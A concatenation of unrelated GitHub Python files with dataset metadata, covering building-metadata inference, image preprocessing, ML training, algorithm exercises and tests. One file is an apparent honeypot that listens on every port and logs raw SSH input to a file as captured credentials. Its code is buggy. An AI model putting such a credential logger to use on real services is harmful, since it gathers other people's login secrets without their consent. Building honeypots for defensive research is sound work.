super(DummyQuiver, self).__init__(\n target_building=target_building,\n target_srcids=target_srcids,\n ui=ui,\n config=config,\n framework_name='quiver')\n self.cache_vav_dict(self.true_g)\n\n def cache_vav_dict(self, true_g):\n qstr = \"\"\"\n select ?point ?srcid ?vav where {\n ?vav a brick:vav.\n ?point bf:isPointOf ?vav .\n ?point bf:srcid ?srcid.\n }\n \"\"\"\n res = query_sparql(true_g, qstr)\n self.point_vav_dict = bidict()\n for row in res:\n vav = row['vav']\n point_srcid = row['srcid']\n point = create_uri(point_srcid)\n self.point_vav_dict[point] = vav\n\n def predict_cached(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n #colocated_points = {}\n occs = self.get_occs()\n for occ in occs:\n print(\"Found it\")\n if self.prior_g and self.prior_confidences\\\n [(URIRef(str(occ)), RDF.type, BRICK.occupied_command)] < 0.5:\n continue\n vav = self.point_vav_dict[URIRef(str(occ))]\n insert_triple(pred_g, (vav, RDF['type'], BRICK['vav']))\n points = self.point_vav_dict.inverse[vav]\n for point in points:\n insert_triple(pred_g, (point, BF['isPointOf'], vav))\n self.pred_g = pred_g\n return self.pred_g\n\n def predict(self, target_srcids=[]):\n return self.predict_cached(target_srcids)\n\n def get_occs(self):\n if self.prior_g:\n qstr = \"\"\"\n select ?occ where {\n ?occ a brick:occupied_command.\n }\n \"\"\"\n res = query_sparql(self.prior_g, qstr)\n occs = [row['occ'] for row in res]\n else:\n qstr = \"\"\"\n select ?srcid where {\n ?occ a brick:occupied_command.\n ?occ bf:srcid ?srcid.\n }\n \"\"\"\n res = query_sparql(self.true_g, qstr)\n srcids = [row['srcid'] for row in res]\n occs = [create_uri(srcid) for srcid in srcids]\n return occs\n\n def predict_raw(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n if self.target_building == 'ebu3b':\n qstr = \"\"\"\n select ?occ ?occ_srcid ?point ?point_srcid where {\n ?occ a brick:occupied_command.\n ?occ bf:srcid ?occ_srcid .\n ?occ bf:isPointOf ?something .\n ?point bf:isPointOf ?something .\n ?point bf:srcid ?point_srcid .\n ?occ bf:isPointOf ?something .\n }\n \"\"\"\n else:\n raise Exception('qstr should be rewritten for {0}'\n .format(self.target_building))\n # TODO: Add confidences (==1)\n res = query_sparql(self.true_g, qstr)\n vav_dict = {}\n #for\n # random_obj = create_uri(str(gen_uuid())) # This would be a VAV.\n for row in res:\n occ_srcid = str(row['occ_srcid'])\n if occ_srcid not in vav_dict:\n vav_dict[occ_srcid] = create_uri(str(gen_uuid())) # This would be a VAV.\n vav = vav_dict[occ_srcid]\n occ = create_uri(occ_srcid)\n point = create_uri(str(row['point_srcid']))\n insert_triple(pred_g, (point, BF['isPointOf'], vav))\n insert_triple(pred_g, (occ, BF['isPointOf'], vav))\n insert_triple(pred_g, (vav, RDF['type'], BRICK['vav']))\n self.pred_g = pred_g\n return pred_g\n\n def predict_dep(self, target_srcids=[]):\n pred_g = self.new_graph(empty=True)\n occs = self.get_occs()\n for occ in occs:\n if self.target_building == 'ebu3b':\n srcid = occ.split('#')[-1]\n qstr = \"\"\"\n select ?point where {{\n ?occ bf:srcid \"{0}\" .\n ?occ bf:isPointOf ?something .\n ?point bf:isPointOf ?something .\n ?point a/rdfs:subClassOf* brick:point .\n }}\n \"\"\".format(srcid)\n else:\n qstr = \"\"\"\n select ?point where {{\n {0} bf:isPointOf ?something .\n ?point bf:isPointOf ?something .\n ?point a/rdfs:subClassOf* brick:point .\n }}\n \"\"\".format(occ.n3())\n res = query_sparql(self.true_g, qstr)\n points = [row['point'] for row in res]\n random_obj = create_uri(str(gen_uuid())) # This would be a VAV.\n for point in points:\n insert_triple(pred_g, (point, BF['isPointOf'], random_obj))\n insert_triple(pred_g, (random_obj, RDF['type'], BRICK['VAV']))\n\n pred_g.serialize('test.ttl', format='turtle')\n self.pred_g = pred_g\n print('Quiver done')\n return pred_g\n\nclass DummyPritoni(Inferencer):\n\n def __init__(self,\n ground_truth_ttl,\n target_building,\n target_srcids,\n source_buildings=[],\n ui=None,\n config={}):\n self.true_g = self.new_graph()\n self.true_g.parse(ground_truth_ttl, format='turtle')\n super(DummyPritoni, self).__init__(\n target_building=target_building,\n target_srcids=target_srcids,\n ui=ui,\n config=config,\n framework_name='quiver')\n\n def get_ahu_datsp(self): #discharge air temperature setpoint\n qstr = \"\"\"\n select ?datsp ?ahu where {\n ?datsp a/rdfs:subClassOf* brick:Discharge_Air_Temperature_Setpoint.\n ?datsp bf:isPointOf ?ahu.\n ?ahu a brick:AHU.\n }\n \"\"\"\n res = query_sparql(self.prior_g, qstr)\n return [\n {\n 'datsp': row['datsp'],\n 'ahu': row['ahu']\n } for row in res\n ]\n\n def get_all_vavs_with_znt(self):\n qstr = \"\"\"\n select ?vav where {\n ?vav a/rdfs:subClassOf* brick:VAV .\n ?znt bf:isPointOf ?vav.\n ?znt a brick:Zone_Temperature_Sensor.\n }\n \"\"\"\n res = query_sparql(self.prior_g + self.schema_g, qstr)\n return [row['vav'] for row in res]\n\n def predict(self):\n pred_g = self.new_graph(True)\n ahu_datsps = self.get_ahu_datsp()\n found_vavs = self.get_all_vavs_with_znt()\n\n for row in ahu_datsps:\n ahu = row['ahu']\n datsp = row['datsp']\n qstr = \"\"\"\n select ?vav where {{\n {0} bf:feeds+ ?vav.\n ?vav a/rdfs:subClassOf* brick:VAV.\n }}\n \"\"\".format(ahu.n3())\n res = query_sparql(self.true_g, qstr)\n true_vavs = [row['vav'] for row in res]\n pred_vavs = [vav for vav in true_vavs if vav in found_vavs]\n for vav in pred_vavs:\n insert_triple(pred_g, (ahu, BF['feeds'], vav))\n\n return pred_g\n\n","repo_name":"plastering/plastering","sub_path":"plastering/inferencers/quiver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"25442182222","text":"# Day 17 project - Quiz\n\nimport random\nfrom time import sleep\nfrom art import logo, end_logo\n\nfrom unicodedata import name\nfrom os import system,name\n\n# define our clear function\ndef clear():\n # for windows\n if name == 'nt':\n _ = system('cls')\n\nclass QuizBrain:\n def __init__(self,q_list):\n self.question_number = 0\n self.question_list = q_list\n self.score = 0\n self.total = len(q_list)\n \n def still_has_questions(self):\n return self.question_number < len(self.question_list)\n \n def next_question(self):\n current_question = random.choice(self.question_list)\n self.question_number += 1\n choice = input(f\"Q{self.question_number}. {current_question.text}? ('True'/'False') : \")\n self.check_answer(choice,current_question)\n \n def check_answer(self,choice,current_question):\n if choice == current_question.answer:\n self.score += 1\n print(\"You got this right!\")\n print(f\"Your score is {self.score}\")\n self.question_list.remove(current_question)\n \n else:\n print(f\"The correct answer is: {current_question.answer}\")\n print(\"Sorry you got this wrong!\")\n sleep(1)\n clear()\n print(f\"{logo}\\n\")\n print(f\"Your final score is {self.score}/{self.total}\\n\")\n print(f\"{end_logo}\")\n exit()","repo_name":"Amar1709/100Days_Python","sub_path":"Day_17/quiz_brain.py","file_name":"quiz_brain.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8417780221","text":"import os\nfrom pathlib import Path\nfrom glob import glob\nimport imutils\nimport cv2\n\nTUMOR_TYPES = ['glioma_tumor', 'meningioma_tumor', 'no_tumor', 'pituitary_tumor']\n\n\ndef show_image(image):\n cv2.imshow(\"Image\", image)\n cv2.waitKey(0)\n\n\ndef get_cropped_coords(image):\n image = cv2.GaussianBlur(image, (5, 5), 0)\n\n thresh = cv2.threshold(image, 10, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.erode(thresh, None, iterations=2)\n thresh = cv2.dilate(thresh, None, iterations=2)\n\n contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n brain_contour = max(contours, key=cv2.contourArea)\n\n x_min = tuple(brain_contour[brain_contour[:, :, 0].argmin()][0])[0]\n x_max = tuple(brain_contour[brain_contour[:, :, 0].argmax()][0])[0]\n y_min = tuple(brain_contour[brain_contour[:, :, 1].argmin()][0])[1]\n y_max = tuple(brain_contour[brain_contour[:, :, 1].argmax()][0])[1]\n\n return x_min, y_min, x_max, y_max\n\n\ndef create_folders_if_not_exist(out_path):\n directory = os.sep.join(out_path.split(os.sep)[:-1])\n Path(directory).mkdir(parents=True, exist_ok=True)\n\n\ndef read_image(image_path):\n image = cv2.imread(image_path)\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\ndef store_image(cropped_image, image_path):\n out_path = image_path.replace(f\"..{os.sep}\", \"\")\n create_folders_if_not_exist(out_path)\n cv2.imwrite(out_path, cropped_image)\n\n\ndef crop_contours(mode):\n assert mode in ['Training', 'Testing']\n\n for tumor_type in TUMOR_TYPES:\n image_paths = glob(f\"..{os.sep}dataset{os.sep}{mode}{os.sep}{tumor_type}{os.sep}*\")\n for image_path in image_paths:\n image = read_image(image_path)\n x_min, y_min, x_max, y_max = get_cropped_coords(image)\n cropped_image = image[y_min:y_max, x_min:x_max]\n store_image(cropped_image, image_path)\n\n\ndef main():\n crop_contours('Training')\n crop_contours('Testing')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SoroushMehraban/Brain-Tumor-Classification","sub_path":"preprocessing/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"35951097777","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\n\ndef train(train_generator, validation_generator):\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, (3, 3), activation='relu', input_shape=(150, 150, 1)),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(256, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(512, (3, 3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n ])\n\n model.compile(optimizer=RMSprop(lr=0.001), loss='binary_crossentropy', metrics=['accuracy'])\n\n history = model.fit(train_generator,\n epochs=50,\n verbose=1,\n validation_data=validation_generator)\n return history\n\n\ndef plot_train_test(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs = range(len(acc))\n\n plt.plot(epochs, acc, 'r', \"Training Accuracy\")\n plt.plot(epochs, val_acc, 'b', \"Validation Accuracy\")\n plt.title('Training and validation accuracy')\n plt.figure()\n\n plt.plot(epochs, loss, 'r', \"Training Loss\")\n plt.plot(epochs, val_loss, 'b', \"Validation Loss\")\n plt.figure()\n\n\nTRAINING_DIR = \"./training\"\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255.,\n rotation_range=40,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest')\ntrain_generator = train_datagen.flow_from_directory(TRAINING_DIR,\n batch_size=4,\n class_mode='binary',\n target_size=(150, 150))\n\nVALIDATION_DIR = \"./testing\"\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255.)\nvalidation_generator = validation_datagen.flow_from_directory(VALIDATION_DIR,\n batch_size=4,\n class_mode='binary',\n target_size=(150, 150))\n\nif __name__ == '__main__':\n history = train()\n plot_train_test(history)\n","repo_name":"mushcatshiro/data-science","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17310656539","text":"from base import *\nfrom life import *\nimport time\nfrom urllib2 import urlopen\n\n\n\n# You Can Change Below\n\nexchange = 'SHFE'\n\nsymbol = 'IF'\n\n# You Can't Change Below!!!\n\n\n\nnames = 'raw_%s_%s_run'%(exchange,symbol)\n\n_plus = 'rebuild'\n_old = 'k_%s_%s_%s'%(exchange,symbol,_plus)\n\nTimeStamp = 0*24*3600*21\ndb = conn[names]['raw']\nn = 100\ncnt = 0\nconn.drop_database(_old)\nwhile(n>=100):\n\trs = list(db.find({},sort=[('time',asc)],limit=n,skip=cnt*n))\n\tn = len(rs)\n\tprint(n*cnt)\n\tfor one in rs:\n\t\tpp = Base(exchange,symbol,conn,allstate,plus=_plus)\n\t\tpp.account_money(float(0.0))\n\t\tpp.new_price(one['_time']+TimeStamp,one['point'],one['price'])\n\t\tpp.get_result()\n\tcnt+=1\n\ttime.sleep(1)","repo_name":"rlcjj/web_ctp-1","sub_path":"py/rebuild.py","file_name":"rebuild.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"8428607571","text":"\"\"\"\n最小全域木とはなんぞやをまずは理解済み.\nクラシカル法だと、Union-Findを使うようなので、\n優先度キューで書けそうなPrim法でトライ。\n\n6 9\n0 1 1\n0 2 3\n1 2 1\n1 3 7\n2 4 1\n1 4 3\n3 4 1\n3 5 1\n4 5 6\n5 <-- 最小全域木の辺の重みの総和を1行に出力\n\"\"\"\nimport heapq\n\ndef main():\n V,E = map(int,input().split())\n G = [[] for _ in range(V)]\n \n for _ in range(E):\n u,v,c = map(int,input().split())\n G[u].append((v,c))\n G[v].append((u,c))\n \n used=[0]*V\n used[0]=1\n que = [(c,u) for u,c in G[0]]\n heapq.heapify(que)\n\n ans = 0\n while que:\n cv,v = heapq.heappop(que)\n if used[v]:\n continue\n used[v]=1\n ans+=cv\n for k,c in G[v]:\n if used[k]:\n continue\n heapq.heappush(que,(c,k))\n print(ans)\n\nif __name__==\"__main__\":\n main()\n","repo_name":"tharashi10/algorithm","sub_path":"atcoder/Bootcamp/64_SpanningTree.py","file_name":"64_SpanningTree.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27848546090","text":"import logging\nimport sys\n\nfrom socketserver import TCPServer, ThreadingTCPServer\n\nlogger = logging.getLogger(\"port-listener\")\nlogger.setLevel(logging.INFO)\n\n# Log to syslog\nsyslog_handler = logging.handlers.SysLogHandler()\nsyslog_formatter = logging.Formatter(\"%(name)s: %(message)s\")\nsyslog_handler.setFormatter(syslog_formatter)\nlogger.addHandler(syslog_handler)\n\n# Log to file\nfile_handler = logging.FileHandler(\"ssh_credentials.log\")\nfile_formatter = logging.Formatter(\"%(asctime)s: %(message)s\")\nfile_handler.setFormatter(file_formatter)\nlogger.addHandler(file_handler)\n\n\nclass PortListener(ThreadingTCPServer):\n def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):\n super().__init__(server_address, RequestHandlerClass, bind_and_activate)\n\n def handle_request(self):\n logger.info(f\"Connection from {self.client_address} on port {self.server_address[1]}\")\n if self.server_address[1] == 22:\n # Log credentials from SSH connections\n logger.info(f\"Credentials: {self.request.recv(1024).decode()}\")\n super().handle_request()\n\n\nif __name__ == \"__main__\":\n # Listen on all common ports\n for port in range(1, 65535):\n try:\n server = PortListener((\"0.0.0.0\", port), TCPServer)\n except OSError:\n continue\n else:\n server.serve_forever()\n","repo_name":"spicy-bear/honeypot","sub_path":"listen2.py","file_name":"listen2.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28548825624","text":"import os\nimport os.path\nimport numpy as np\nfrom numpy.testing import *\nfrom numpy.testing.decorators import skipif\n\nfrom tempfile import NamedTemporaryFile\n\nfrom skimage import data_dir\nfrom skimage.io import imread, imsave, use_plugin, reset_plugins\nimport skimage.io as sio\n\ntry:\n import imread as _imread\nexcept ImportError:\n imread_available = False\nelse:\n imread_available = True\n\n\ndef setup():\n if imread_available:\n np.random.seed(0)\n use_plugin('imread')\n\n\ndef teardown():\n reset_plugins()\n\n\n@skipif(not imread_available)\ndef test_imread_flatten():\n # a color image is flattened\n img = imread(os.path.join(data_dir, 'color.png'), flatten=True)\n assert img.ndim == 2\n assert img.dtype == np.float64\n img = imread(os.path.join(data_dir, 'camera.png'), flatten=True)\n # check that flattening does not occur for an image that is grey already.\n assert np.sctype2char(img.dtype) in np.typecodes['AllInteger']\n\n\n@skipif(not imread_available)\ndef test_imread_palette():\n img = imread(os.path.join(data_dir, 'palette_color.png'))\n assert img.ndim == 3\n\n\n@skipif(not imread_available)\ndef test_imread_truncated_jpg():\n assert_raises((RuntimeError, ValueError),\n sio.imread,\n os.path.join(data_dir, 'truncated.jpg'))\n\n\n@skipif(not imread_available)\ndef test_bilevel():\n expected = np.zeros((10, 10), bool)\n expected[::2] = 1\n\n img = imread(os.path.join(data_dir, 'checker_bilevel.png'))\n assert_array_equal(img.astype(bool), expected)\n\n\nclass TestSave:\n def roundtrip(self, x, scaling=1):\n f = NamedTemporaryFile(suffix='.png')\n fname = f.name\n f.close()\n imsave(fname, x)\n y = imread(fname)\n\n assert_array_almost_equal((x * scaling).astype(np.int32), y)\n\n @skipif(not imread_available)\n def test_imsave_roundtrip(self):\n dtype = np.uint8\n for shape in [(10, 10), (10, 10, 3), (10, 10, 4)]:\n x = np.ones(shape, dtype=dtype) * np.random.rand(*shape)\n\n if np.issubdtype(dtype, float):\n yield self.roundtrip, x, 255\n else:\n x = (x * 255).astype(dtype)\n yield self.roundtrip, x\n\nif __name__ == \"__main__\":\n run_module_suite()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/skimage/io/tests/test_imread.py","file_name":"test_imread.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"37658846964","text":"import pandas as pd\nimport os\nfrom src.etl.load_file import save_datafame_to_jsonl_file\n\ndef test_save_data_converts_pandas_df_to_jsonl_and_saves_file():\n test_file_path = \"./test_save.jsonl\"\n test_df = pd.DataFrame({\"test\":[1,2,3], \"data\": [\"one\", \"two\", \"three\"]})\n\n save_datafame_to_jsonl_file(test_df, test_file_path)\n\n assert os.path.isfile(test_file_path)\n with open(test_file_path, \"r\") as file:\n lines = [line for line in file]\n assert '{\"test\":1,\"data\":\"one\"}\\n' == lines[0]\n assert '{\"test\":2,\"data\":\"two\"}\\n' == lines[1]\n assert '{\"test\":3,\"data\":\"three\"}\\n' == lines[2]\n os.remove(test_file_path)","repo_name":"Josh-Robson/python-project","sub_path":"tests/test_methods/test_save_data.py","file_name":"test_save_data.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18636476901","text":"class Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n replace = dict()\n for i, c in enumerate(s):\n r = replace.get(c, None)\n if r and t[i] != r:\n return False\n if t[i] in replace.values() and r != t[i]:\n return False\n replace[c] = t[i]\n return True","repo_name":"Mihir-1/LeetCode-Algorithms","sub_path":"0205-isomorphic-strings/0205-isomorphic-strings.py","file_name":"0205-isomorphic-strings.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16219807737","text":"import math\nimport random\n\nimport torch\nfrom torch import nn\n\n\nclass PosEncoding(nn.Module):\n def positional_encoding(self,tta, basis=10000., dimensions=256):\n z = torch.zeros(dimensions, device='cuda') # .type(torch.float16)\n indices = torch.arange(0, dimensions, 2, device='cuda').type(torch.float32)\n z[indices.long()] = torch.sin(tta / torch.pow(basis, indices / dimensions))\n z[indices.long() + 1] = torch.cos(tta / torch.pow(basis, indices / dimensions))\n return z\n def __init__(self,max_tta,dims):\n super(PosEncoding, self).__init__()\n ttaEncoding = torch.empty(max_tta, dims)\n for tta in range(max_tta):\n ttaEncoding[tta] = self.positional_encoding(tta,basis=10000.,dimensions=dims)\n self.register_buffer(\"ttaEncoding\", ttaEncoding)\n def forward(self,id):\n return self.ttaEncoding[id]\ndef add_pos_info(latent,embedings,tta,t_max):\n t = min(tta, t_max)\n pos = embedings(t)\n #pos = torch.cat((pos,pos,pos),dim=-1)\n return latent+pos\n\ndef multi_concat(context_state,context_offset,context_target,embeddings,embeddings512,noise_per_sequence,tta,t_max):\n t = torch.where(tta < t_max, tta, t_max)\n embeddings_vector = []\n embeddings512_vector = []\n for i in range(t.shape[0]):\n embeddings_vector.append(embeddings(t[i]).view(1,1,-1))\n embeddings512_vector.append(embeddings512(t[i]).view(1,1,-1))\n embeddings_vector = torch.cat(embeddings_vector,dim=1) # 1, 8 ,256\n embeddings512_vector = torch.cat(embeddings512_vector,dim=1)\n h_target = context_target + embeddings_vector\n h_state = context_state + embeddings512_vector\n h_offset = context_offset + embeddings_vector\n\n lambda_tar = torch.where(t>30,1.,torch.where(t<5.,0,(t-5.)/25.))\n # if tta >= 30:\n # lambda_tar = 1.\n # elif tta < 5:\n # lambda_tar = 0.\n # else:\n # lambda_tar = (tta - 5.) / 25.\n h_target = torch.cat((h_offset, h_target), dim=-1)\n h_target = h_target + lambda_tar.view(1,-1,1) * noise_per_sequence.unsqueeze(1)\n\n return torch.cat((h_state, h_target), dim=-1), h_target\ndef concat(context_state,context_offset,context_target,embeddings,embeddings512,noise_per_sequence,tta,t_max):\n# t = torch.min(tta,t_max) # MAXFRAME+10-5\n t = min(tta,t_max)\n h_target = context_target + embeddings(t)\n h_state = context_state + embeddings512(t)\n h_offset = context_offset + embeddings(t)\n if tta >= 30:\n lambda_tar = 1.\n elif tta < 5:\n lambda_tar = 0.\n else:\n lambda_tar = (tta - 5.) / 25.\n h_target = torch.cat((h_offset, h_target), dim=-1)\n h_target = h_target + lambda_tar * noise_per_sequence\n\n return torch.cat((h_state,h_target),dim=-1),h_target\n\nclass SeqScheduler():\n def __init__(self,initial_seq,max_seq):\n self.initial_seq = initial_seq\n self.max_seq = max_seq\n # self.epoch = epoch\n def progress(self,t:float):\n t = min(max(t,0.),1.)\n out = (self.max_seq-self.initial_seq)*t+self.initial_seq\n return int(out)\n def range(self,t:float):\n upper = self.progress(t)\n return random.randint(self.initial_seq,upper)\n\nclass ATNBlock(nn.Module):\n def __init__(self,content_dims,style_dims):\n super(ATNBlock, self).__init__()\n in_ch = content_dims\n self.in_ch = content_dims\n self.sty_ch = style_dims\n self.f = nn.Linear(content_dims, style_dims)\n self.g = nn.Linear(style_dims, style_dims)\n self.h = nn.Linear(style_dims, style_dims)\n self.sm = nn.Softmax(dim=-2)\n self.k = nn.Linear(style_dims, in_ch)\n self.norm = nn.InstanceNorm2d(style_dims,affine=False)\n self.norm_content = nn.InstanceNorm1d(content_dims,affine=False) #LayerNorm(keep the same as AdaIn)\n # self.s = []\n def forward(self, fs, fd,pos, first):\n #return fd\n N,T,C = fs.shape\n N,C = fd.shape\n x = fd\n s_sty = fs\n # N,C : fd.shape\n # N,C,T : fs.shape\n b = s_sty.shape[0]\n\n F = self.f(self.norm_content(x)).unsqueeze(-1) # N,C,1\n if(first):\n G = self.g(self.norm(s_sty)) #N,T,C\n self.G = G.view(b, -1, self.sty_ch) # N,T,C\n #s_sty_pos = s_sty+pos_embedding.view(1,C,1)\n self.H = self.h(s_sty).transpose(1,2) #N,C,T\n #H = H.view(b, self.sty_ch, -1) # N,C,T\n\n\n F = F.view(b, self.sty_ch, -1) #N,C,1\n\n S = torch.bmm(self.G,F) #N,T,1\n\n S = self.sm(S/math.sqrt(self.G.shape[-1]))\n # self.s.append(S)\n O = torch.bmm(self.H, S) # N,C,1\n\n O = O.view(x.shape[:-1]+(self.sty_ch,))\n\n O = self.k(O)\n O += x\n return O\n\nclass AdaInNorm2D(nn.Module):\n r\"\"\"MLP(fs.mean(),fs.std()) -> instanceNorm(fd)\"\"\"\n def __init__(self,style_dims,content_dim,n_joints=0):\n\n super(AdaInNorm2D, self).__init__()\n\n self.affine2 = nn.Linear(style_dims, style_dims)\n self.act = nn.ELU()#nn.LeakyReLU(0.2)\n self.affine3 = nn.Linear(style_dims, style_dims)\n self.affine4 = nn.Linear(style_dims, content_dim * 2)\n self.norm = nn.InstanceNorm1d(512)\n self.dropout = nn.Dropout(0.1)\n\n def forward(self, s, d ,pos_emedding,first):\n if(first):\n N,T,C = s.shape\n s = torch.mean(s,dim=1) #N,C\n s = self.affine2(s)\n s = self.act(s)\n s = self.dropout(s)\n s = self.affine4(s)\n self.gamma, self.beta = torch.chunk(s, chunks=2, dim=1)\n\n d = self.norm(d)\n return (1 + self.gamma) * d + self.beta\n","repo_name":"yuyujunjun/RSMT-Realtime-Stylized-Motion-Transition","sub_path":"src/Net/TransitionNet.py","file_name":"TransitionNet.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"71137769706","text":"#Zachary Robin\n#CSCI 169\n#Programming HW2 \n#Part 1\ndef fun(x,y):\n z=x+y\n print(z)\n return z\nfun(1,2)\nfun(\"hi\",\"there\")\n\n#Part 2\ndef report(xs):\n #y will keep track of the number of students \n #z will keep track of the score \n #q will hold the string of names\n y = 0\n z=0\n q= xs[1]\n for x in xs:\n for x in xs:\n if(type(x)==int):\n y = y +1\n z = z + x\n if (x-1):\n if(type(x-1) == int):\n q = \", \" + str(x)\n\n print(q + \"averaged: \" + str(z/y))\nreport([\"Jill\", \"Johnson\", 87, \"Billy\", \"Ray\", \"Cyrus\", 78, \"Rita\", \"Yeats\", \"Bobbie\", \"Sue\", \"Palmer\", 72])\n\n#Part 3\n#A simple print function \ndef printfun(x):\n for i in x:\n print(str(i) + \" \")\n print()\n\n#The partition function \ndef partition(input, p, r):\n pivot = input[r]\n while p pivot:\n r = r-1\n if input[p] == input[r]:\n p = p+1\n elif p 100:\n break\n\ndataframe = {'UserName': Usernames, 'TimeStamps': TimeStamps, 'Tweets': Tweets, 'Replies': Replies, 'Retweets': Retweets, 'Likes': Likes,}\ndf = pd.DataFrame(dataframe)\ndf.to_csv('InfoSec.csv')\ndata = pd.read_csv('InfoSec.csv')\ntweets = data['Tweets'].astype(str)\nprint(\"|======== ======== ======== ======== RESULTS ======== ======== ======== ========|\" )\nfor tweet in tweets:\n print(predict([tweet]),\",\"+tweet)\n","repo_name":"NoDataFound/BMIS","sub_path":"bmis.py","file_name":"bmis.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8397836661","text":"from pygments.lexer import RegexLexer, words, re\nfrom pygments.token import Text, Operator, Keyword, Name, Comment\n\n__all__ = ['RoboconfGraphLexer', 'RoboconfInstancesLexer']\n\n\nclass RoboconfGraphLexer(RegexLexer):\n \"\"\"\n Lexer for `Roboconf `_ graph files.\n\n .. versionadded:: 2.1\n \"\"\"\n name = 'Roboconf Graph'\n aliases = ['roboconf-graph']\n filenames = ['*.graph']\n\n flags = re.IGNORECASE | re.MULTILINE\n tokens = {\n 'root': [\n # Skip white spaces\n (r'\\s+', Text),\n\n # There is one operator\n (r'=', Operator),\n\n # Keywords\n (words(('facet', 'import'), suffix=r'\\s*\\b', prefix=r'\\b'), Keyword),\n (words((\n 'installer', 'extends', 'exports', 'imports', 'facets',\n 'children'), suffix=r'\\s*:?', prefix=r'\\b'), Name),\n\n # Comments\n (r'#.*\\n', Comment),\n\n # Default\n (r'[^#]', Text),\n (r'.*\\n', Text)\n ]\n }\n\n\nclass RoboconfInstancesLexer(RegexLexer):\n \"\"\"\n Lexer for `Roboconf `_ instances files.\n\n .. versionadded:: 2.1\n \"\"\"\n name = 'Roboconf Instances'\n aliases = ['roboconf-instances']\n filenames = ['*.instances']\n\n flags = re.IGNORECASE | re.MULTILINE\n tokens = {\n 'root': [\n\n # Skip white spaces\n (r'\\s+', Text),\n\n # Keywords\n (words(('instance of', 'import'), suffix=r'\\s*\\b', prefix=r'\\b'), Keyword),\n (words(('name', 'count'), suffix=r's*:?', prefix=r'\\b'), Name),\n (r'\\s*[\\w.-]+\\s*:', Name),\n\n # Comments\n (r'#.*\\n', Comment),\n\n # Default\n (r'[^#]', Text),\n (r'.*\\n', Text)\n ]\n }\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/roboconf.py","file_name":"roboconf.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"28945393432","text":"import cv2\nimport datetime\nimport numpy as np\nimport torch\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nfrom pytorch3d.io import save_obj\nfrom shutil import copyfile\n\nclass Loggers:\n loggers = {}\n metrics = {}\n exp_name = \"\"\n path = \"\"\n time=\"\"\n vis=True\n def __init__(self) -> None:\n pass\n\n def init(self, exp_name=\"experiment\",path=\"/mnt/HDD/exp_log\", show=False, debug=False):\n self.time = f'{datetime.datetime.now():%d-%b-%y-%H-%M-%S}'\n self.exp_name=exp_name\n self.prefix = path\n self.path = os.path.join(self.prefix, self.exp_name, self.time)\n self.show = show\n self.debug=debug\n os.makedirs(self.path,exist_ok=True)\n self.core_logger = SummaryWriter(log_dir = self.path)\n\n def add_image(self, name, content = None, step=0, type = \"video\", flip=True):\n if torch.is_tensor(content):\n content = content.detach().cpu().numpy()\n \n if flip:\n content = cv2.flip(content, 0)\n\n if len(content.shape) == 3:\n content = content[..., :3]\n \n content = np.clip(content,0,1)\n content = (content*255).astype(np.uint8)\n\n if content.shape[-1]==3:\n content = 